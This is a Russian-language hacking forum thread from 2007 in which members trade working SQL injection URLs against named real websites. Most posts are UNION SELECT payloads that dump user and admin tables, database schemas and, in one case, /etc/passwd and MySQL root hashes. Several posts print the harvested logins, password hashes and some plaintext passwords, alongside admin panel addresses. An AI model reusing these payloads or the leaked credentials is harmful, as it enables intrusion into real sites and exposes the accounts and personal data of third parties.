SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Сайты разработки студии 8000.ru


    http://piroclub.ru/product_full.php?id=-3068+union+select+1,2,concat(name,0x3a,login,0x3a,password,0x3a,email),4,5+from+users/*&group_id=122
    _________________________________

    http://www.piro.ru/news_details.php?id=-89+union+select+1,2,concat_ws(0x3a,id,name,login,password,email),4,5,6+from+users+limit+0,1/*
    _________________________________

    http://www.ibercork.ru/news.php?id=-34+union+select+1,2,concat(login,0x3a,pass,0x3a,ip)+from+my8pref_adm_usr+limit+0,1/*
    ibercork:ibercork
    _________________________________

    http://www.gelionn.ru/subcatalog.php?id=-83+union+select+1,concat(table_name,0x3a,column_name),3+from+information_schema.columns/*
    _________________________________
    http://www.sbaspect.ru/pages/?parent=37&id=43&sub=-102+union+select+1,concat(login,0x3a,pass,0x3a,ip)+from+my8pref_adm_usr+limit+0,1/*&name=
    admin:5c5fd0f154926edd45f17f9e5064940e
    sbadmin:123
    seo:f2f9364e99cad8adc315a13c2f00a922
     
    1 person likes this.
  2. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    http://services.rol.ru/portal/site/start/menuitem.85bccd817d90ed8faea08a10b751342c/?articleid=-117+union+select+1,2,3,4,5,6,7+from+users/*
     
    1 person likes this.
  3. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    продолжение...


    http://www.avtovector.ru/service.php?id=-5+union+select+1,table_name+from+information_schema.tables/*
    _________________________________

    http://soft.su/?pages_id=4&supplier=-22+union+select+1,2,concat_ws(0x3a,user_login,user_password,user_email),4,5+from+cls_users+limit+1,1/*
    админ clite:clite
    _________________________________
    http://moy-dom.ru/katalog/?action=show_f&id=-3395+union+select+1,2,3,4,table_name,6+from+information_schema.tables/*

    _________________________________

    http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat(login,0x3a,pass),5,6,7,8+from+bestsport_2.my8pref_adm_usr+limit+0,1/*

    http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat(login,0x3a,password),5,6,7,8+from+users+limit+0,1/*
     
    #3643 sasTO, 11 Nov 2007
    Last edited: 11 Nov 2007
  4. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    далее...

    http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat_ws(0x3a,first_name,last_name,email,login,password,patronymic),5,6,7,8+from+bestsport_2.members+limit+0,1/*

    http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),5,6,7,8+from+phpbb_pingpong_users+limit+1,1/*

    Админ на форуме kungpo:alex5

    http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,login,pwd),4,5+from+aut_users+limit+2,1/*

    ________________________________

    код:

    http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,email,name,login,password,phone,city,address),4,5+from+book_users+limit+0,1/*

    ________________________________

    код:

    http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password,email),4,5+from+conf_users+limit+0,1/*

    ________________________________

    код:

    http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password,email),4,5+from+forum_users+limit+0,1/*
     
    #3644 sasTO, 11 Nov 2007
    Last edited: 11 Nov 2007
    2 people like this.
  5. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    bіgmіr.net

    http://mystery.bіgmіr.net/game/frames/userdetails.php?id=25+and+1=1/*'

    http://mystery.bіgmіr.net/game/frames/userdetails.php?id=-25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78/*'

    http://mystery.bіgmіr.net/game/frames/userdetails.php?id=-25+union+select+1,CONCAT_WS(0x3A,VERSION(),USER%20(),DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78/*'


    5.0.45-log:mysterygame@localhost:mystery

    p.s. бага недавно исправлена

    з.з.ы. у меня сегодня 2 года реге на ачате УРЯ!!!
     
    _________________________
    #3645 halkfild, 11 Nov 2007
    Last edited: 11 Nov 2007
    5 people like this.
  6. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Едем дальше...
    ________________________________

    http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,email,login,password,pages,info),4,5+from+page_users+limit+0,1/*

    ________________________________
    код:

    http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,id,email,password,phone,org,contact,name,occupation,sphere),4,5+from+users+limit+0,1/*
    ________________________________
    код:

    http://www.superagent.ru/news.php?act=one&nid=-185+union+select+1,2,3,4,concat(table_name,0x3a,column_name)+from+information_schema.columns/* сразу все таблы и колонки.

    ________________________________
    http://www.7000.ru/company/news_details.php?id=-327+union+select+1,2,3,concat_ws(0x3a,email,icq,login,password),5,6+from+7000_stuff_users+limit+0,1/*
    ________________________________
    а это виновник всего :)

    http://www.8000.ru/new.php?otd=dis&idm=14+union+select+1,2,3,4,5,6/*&id=21 вывод в исходнике
    Прошу прощения что в несколько постов,иначе не смог-браузер телефона не позволяет
     
    3 people like this.
  7. Dark[<X>]D1ablo

    Dark[<X>]D1ablo New Member

    Joined:
    21 Oct 2007
    Messages:
    5
    Likes Received:
    3
    Reputations:
    0
    http://www.happyland.ru/brands.php?id=-2+union+select+1,DATABASE(),3,VERSION(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
    дальше не захотел продолжеть с этим ресурсом, так как компания не малая не хочется проблем...



    http://www.fostas.ru/library/show_article.php?id=-103+union+select+1,2,database()/*

    http://www.t-dsk.ru/index.php?id=-7+union+select+1,database(),3/*
     
    #3647 Dark[<X>]D1ablo, 11 Nov 2007
    Last edited: 11 Nov 2007
    2 people like this.
  8. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Там еще много сайтов которые можно раскрутить на скуль инъекцию ;)
    ,портфолио главного героя со списком сайтов:
    lazarevich.info/portfolio/two/print
     
  9. FoxMALDER

    FoxMALDER Elder - Старейшина

    Joined:
    26 Jul 2007
    Messages:
    43
    Likes Received:
    20
    Reputations:
    -1
    Астера - коммерческая недвижимость
    5.0.45atlanticspbsu[email protected]
    Code:
    http://www.asteragroup.ru/?cid=3&sid=-28+union+select+concat_ws(0x05,version(),database(),user()),2/*
    http://www.asteragroup.ru/?cid=3&sid=-28+union+select+concat_ws(0x05,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),2+from+information_schema.columns+limit+1/*
    DB: atlanticspbsu
    Code:
    analitic_cat
    analitic_cat_en
    analitic_files
    analitic_files_en
    category
    classes
    dictionary
    down_categories
    down_files
    eng_news
    estate_cat
    estate_contact
    estate_descr_en
    estate_descr_ru
    estate_obj_type
    estate_pic
    estate_razd_type
    estate_region
    investment_ru
    maillist
    maillistt
    mainmenu
    modules
    omenu
    prjterms_cat
    prjterms_list
    projects
    projects_area
    projects_descr_en
    projects_descr_ru
    projects_pic
    projects_region
    realtypic
    realtyrent
    regions
    rus_news
    static
    users (id,firstname,lastname,user_id,pwd,group_id,status,dt)
    users_group_cat (gid,group_name)
    DB: atlanticspbsu_1
    Code:
    CLASSES
    DICTIONARY
    ELEMENTS
    IMAGES
    OBJECTS
    PAGES
    PAGE_INFO
    PAGE_PARAMS
    PAGE_PARTS
    PAGE_PART_INFO
    PAGE_PARTS_PARAMS
    PARAMS
    REVIEWES
    SITES
    TEMPLATES
    TEMPLATE_PARAM_TYPES
    Админка тут , а админа пасс ниже... :cool:
    Code:
    http://www.asteragroup.ru/?cid=3&sid=-28+union+select+concat_ws(0x05,user_id,pwd),2+from+users/*
    P.S.: Бонус - здесь ... ;)
    P.P.S.: Чуть не забыл, результат в title выводится! :p
     
    #3649 FoxMALDER, 11 Nov 2007
    Last edited: 11 Nov 2007
    1 person likes this.
  10. FoxMALDER

    FoxMALDER Elder - Старейшина

    Joined:
    26 Jul 2007
    Messages:
    43
    Likes Received:
    20
    Reputations:
    -1
    5.0.45-logsdporgu_frinetuasdporgu_fri@localhost
    Code:
    http://www.fri.net.ua/loadnews.php?id=-1+union+select+1,2,concat_ws(0x05,version(),database(),user()),4,5,6,7,8,9,10,11,12/*
    http://www.fri.net.ua/loadnews.php?id=-1+union+select+1,2,concat_ws(0x05,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),4,5,6,7,8,9,10,11,12+from+information_schema.columns+limit+0,1/*
    
     
    #3650 FoxMALDER, 11 Nov 2007
    Last edited: 11 Nov 2007
  11. -MoLoToK-

    -MoLoToK- Elder - Старейшина

    Joined:
    4 Oct 2007
    Messages:
    30
    Likes Received:
    23
    Reputations:
    3
    Внимание лицам не достигшим 18 лет просматривать данную скулю не рекомендуется)))

    Скуля
    Code:
    http://pornoshara.com/item.php?tid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
    Mysql.user
    Code:
    http://pornoshara.com/item.php?tid=-1'+union+select+1,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user/*
    user:pass
    -----------------------
    Code:
    http://pornoshara.com/item.php?tid=-1'+union+select+1,2,3,4,5,6,7,8,user,10,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user/*
    root:*111921C1B9EE2D4BD4C825031689DCD63239883F
    -----------------------
    Code:
    http://pornoshara.com/item.php?tid=-1'+union+select+1,2,3,4,5,6,7,8,password,10,11,12,13,14,convert(concat(load_file(0x2f6574632f706173737764)),binary),16,17,user,19,20,21,22,23,24,25,26,27,28+from+mysql.user+limit+2,1/*
     
    2 people like this.
  12. Elvis000

    Elvis000 Патриот

    Joined:
    23 Apr 2007
    Messages:
    600
    Likes Received:
    339
    Reputations:
    148
    Лесная промышленность
    www.woodpages.ru

    Code:
    http://www.woodpages.ru/rubrik.php?param=news2&id_com=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),3,4,5,6,7,8,9,10/*
    user:eek:ilpagesru@localhost
    version:4.1.15-log
    base:eek:ilpagesru_wood
     
    1 person likes this.
  13. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.wapnet.pl/comment.php?what=news&id=16+UNION+SELECT+1,2,concat(nick,0x2b,pass,0x2b,icq),4,5,6,7,8,9,10,11,12+from+users/*
    HTML:
    http://www.wapnet.pl/comment.php?what=news&id=16+UNION+SELECT+1,2,pass,4,5,6,7,8,9,10,11,12+from+admins/*
    rambo8:aeb499f90812d76a658cb992513ace90:pleple
    robak:aeb499f90812d76a658cb992513ace90:pleple
    bibiak:d64773c962c978417cd6b9112064dbf7

    админка
    HTML:
    http://www.wapnet.pl/admin.php
     
    #3653 KEHT33, 11 Nov 2007
    Last edited: 11 Nov 2007
    1 person likes this.
  14. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Уязвимость на http://www.cotka.ru/. Крупный онлайн портал по покупке/продаже сотовых телефонов и аксессуаров.

    Поиск по таблицам:

    Интересные таблицы: Users_contacts (контактные данные пользователей), Credits (информация по кредитам пользователей), Users_list (учётные данные пользователей).

    Поиск по полям в Credits:

    Поиск по полям в Users_list:

    Логин:хеш-пароля (походу MD5):

     
    3 people like this.
  15. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    joburionline.ro
    Code:
    http://www.joburionline.ro/catalog.php?cat=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9/*
    1. 4.1.22-standard-log:joburion_joburi:joburion_user@localhost

    perlasuferintei.ro
    Code:
    http://www.perlasuferintei.ro/catalog.php?mod=detaliiCarte&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12/*
    4.0.27-standard:perla_perlasuferintei:perla@localhost

    reklamni-predmety.name
    Code:
    http://www.reklamni-predmety.name/catalog.php?cat=5&subcat=60&brand=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12/*
    5.0.22-Debian_0ubuntu6.06.2:reklamni-predmety5695:reklamni-pre5695@localhost
     
    2 people like this.
  16. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    e-shop

    http://www.semicom.lv/

    Users:
    Code:
    http://www.semicom.lv/index.php?page=list&l1=81+union+select+1,2,3,4,5,6,concat_ws(0x3a,name,pass,email),8,9,1+from+users+limit+0,1/*
    Admins:
    Code:
    http://www.semicom.lv/index.php?page=list&l1=81+union+select+1,2,3,4,5,6,concat(login,0x3a,pwd),8,9,1+from+admins+limit+0,1/*
    http://www.semicom.lv/admin.php
    semicom : plokij123
     
    1 person likes this.
  17. FoxMALDER

    FoxMALDER Elder - Старейшина

    Joined:
    26 Jul 2007
    Messages:
    43
    Likes Received:
    20
    Reputations:
    -1
    Ауди Центр Витебский - официальный дилер Audi в Санкт-Петербурге
    4.1.21-logdb0013135000131350@localhost
    Code:
    http://www.audi-vitebskiy.ru/index/experience/index/experience/index/experience/index.php?ob=class2&idclass=-10+union+select+1,2,concat_ws(0x05,version(),database(),user()),4,5,6,7,8,9,10,11/*
    di_bodytype
    di_carclass
    di_carclassgallery
    di_carmodel
    di_carmodelparam
    di_carmodelspec
    news
     
    1 person likes this.
  18. v1ru$

    v1ru$ Elder - Старейшина

    Joined:
    17 Mar 2007
    Messages:
    272
    Likes Received:
    196
    Reputations:
    17
    что мне невезёт на 5й мускул(
    Везде 4й мускул
    Code:
    http://sanotdel.ru/php/shoper_view.php3?id=180+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(concat(version(),0x3a,user(),0x3a,database(),0x78),0x78),6,7,8,9,10,11,12,13,14,15,16/*
    
    Code:
    http://asv.spb.ru/?id=-16+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(version(),0x3a,user(),0x3a,database(),0x78),0x78),0x78)/*
    
    Code:
    http://top.apic.ru/index.cgi?Template=description&Id=-6484+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15,16,17,18,19,20/*
    
     
    2 people like this.
  19. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.dlugosiodlo.pl/module.php?op=art&topic=-6+UNION+SELECT+1,concat(id,0x2b,nick,0x2b,pass,0x2b,icq),3,4,5+from+users+limit+0,1/*
    БД 4

    HTML:
    http://www.wolnykraj.info/infopage.php?id=-6+UNION+SELECT+1,2,concat(nick,0x2b,pass),4,5,6,7+from+r_users/*
    БД 5 ещё интересная таблица wolny_admins и wolny_users
     
    #3659 KEHT33, 11 Nov 2007
    Last edited: 12 Nov 2007
  20. Dark[<X>]D1ablo

    Dark[<X>]D1ablo New Member

    Joined:
    21 Oct 2007
    Messages:
    5
    Likes Received:
    3
    Reputations:
    0
    http://www.business-academy.ru/viezd.php?id=-11+union+select+1,database(),3,user(),5/*

    названия таблиц по ходу дела косые....



    http://www.ayda.ru/hotels/show_country.php?id=-2+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13,14,15,16/*

    version mysql 5.0.37
     
    #3660 Dark[<X>]D1ablo, 12 Nov 2007
    Last edited: 12 Nov 2007
Thread Status:
Not open for further replies.